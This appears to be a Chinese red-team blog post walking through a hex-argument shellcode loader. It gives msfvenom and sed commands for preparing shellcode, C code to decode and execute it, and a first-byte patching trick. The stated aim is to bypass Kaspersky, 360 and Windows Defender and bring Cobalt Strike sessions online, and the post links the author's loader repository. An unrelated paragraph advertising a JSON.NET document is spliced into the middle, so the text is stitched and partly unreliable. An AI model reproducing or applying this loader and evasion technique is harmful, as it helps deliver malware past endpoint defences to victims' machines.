在github有一个ssi的项目,项目地址如下:https://github.com/dimopouloselias/simpleshellcodeinjector/他可以实现shellcode的远程加载(十六进制),当然ldrakura也曾经搞过类似的项目(我偷电瓶车养你啊),当时还是一次项目时绕卡巴斯基的时候他丢我的。本文将简单介绍该项目的原理,并给出其他实现方法。
shellcode处理
首先需要处理shellcode,这里推荐使用kali直接处理,推荐下面的两种方法。
代码语言:javascript代码运行次数:0运行复制cat 1.txt | grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"
或者
代码语言:javascript代码运行次数:0运行复制msfvenom -p windows/exec CMD=calc.exe -f raw | xxd -ps
cs的shellcode推荐第二种,如果是第一种,需要做一些调整操作,像下面这样:
加载原理
加载器通过参数的方式传递hex的shellcode到加载器内,然后使用一些操作还原shellcode,这里有一些需要注意的点,比如数组的长度为1066,那么他就是由shellcode[0]=f到shellcode[1665]=7构成后面加上一个终止符,此时strlen(shellcode)=1666,sizeof(shellcode)=1667,所以在计算长度时便需要这样 x=(sizeof(shellcode) - 1) . or x= strlen(shellcode),因为每两个字节为一组,所以我们在分配内存时,需要进行除二操作,比如bytes = (sizeof(shellcode) - 1)/2 或者bytes = strlen(shellcode)/2。
接下来便是还原shellcode的操作了
代码语言:javascript代码运行次数:0运行复制for(unsigned int i = 0; i< iterations-1; i++) { sscanf(shellcode+2*i, "%2X", &char_in_hex); shellcode[i] = (char)char_in_hex; }或者使用下面这样的方法:
代码语言:javascript代码运行次数:0运行复制void AsciiToHex(char * pAscii, unsigned char * pHex, int nLen) { if (nLen % 2) return; int nHexLen = nLen / 2; for (int i = 0; i < nHexLen; i++) { unsigned char Nibble[2]; Nibble[0] = *pAscii++; Nibble[1] = *pAscii++; for (int j = 0; j < 2; j++) { if (Nibble[j] <= 'F' && Nibble[j] >= 'A') Nibble[j] = Nibble[j] - 'A' + 10; else if (Nibble[j] <= 'f' && Nibble[j] >= 'a') Nibble[j] = Nibble[j] - 'a' + 10; else if (Nibble[j] >= '0' && Nibble[j] <= '9') Nibble[j] = Nibble[j] - '0'; else return; } // for (int j = ...) pHex[i] = Nibble[0] << 4; // Set the high nibble pHex[i] |= Nibble[1]; //Set the low nibble } // for (int i = ...) }然后剩下的便是分配内存、装入shellcode,作者使用的是
代码语言:javascript代码运行次数:0运行复制(*(void (*)()) exec)();
来进行最后的加载。
测试
明白原理之后,重新编译(原文件md5可能已被标记),使用360全家桶进行扫描:
联网情况下是没有任何问题的,然后上线我们的cs试试:
可直接上线,注:x64的shellcode上线有问题,程序会崩溃。
本文档主要讲述的是JSON.NET 简单的使用;JSON.NET使用来将.NET中的对象转换为JSON字符串(序列化),或者将JSON字符串转换为.NET中已有类型的对象(反序列化?)。希望本文档会给有需要的朋友带来帮助;感兴趣的朋友可以过来看看
修改
更改shellcode前几个字节,然后加载到内存更改回来,然后解密hex加载,并更改shellcode加载方式。
更改加载的方法之前也是发过的。
反转方式如下:
代码语言:javascript代码运行次数:0运行复制char first[] = "\xfc";memcpy(shellcode,fisrt,1);
加载方式如下:
代码语言:javascript代码运行次数:0运行复制typedef void (*some_func)(); some_func func = (some_func)exec; func();
ps:只是更改了一个写法。
测试弹出计算器:
windows defender上线测试:
总结:
cs生成的shellcode过长,可想直接写入程序,程序下载地址:
https://github.com/lengjibo/RedTeamTools/tree/master/windows/SSI
欢迎star
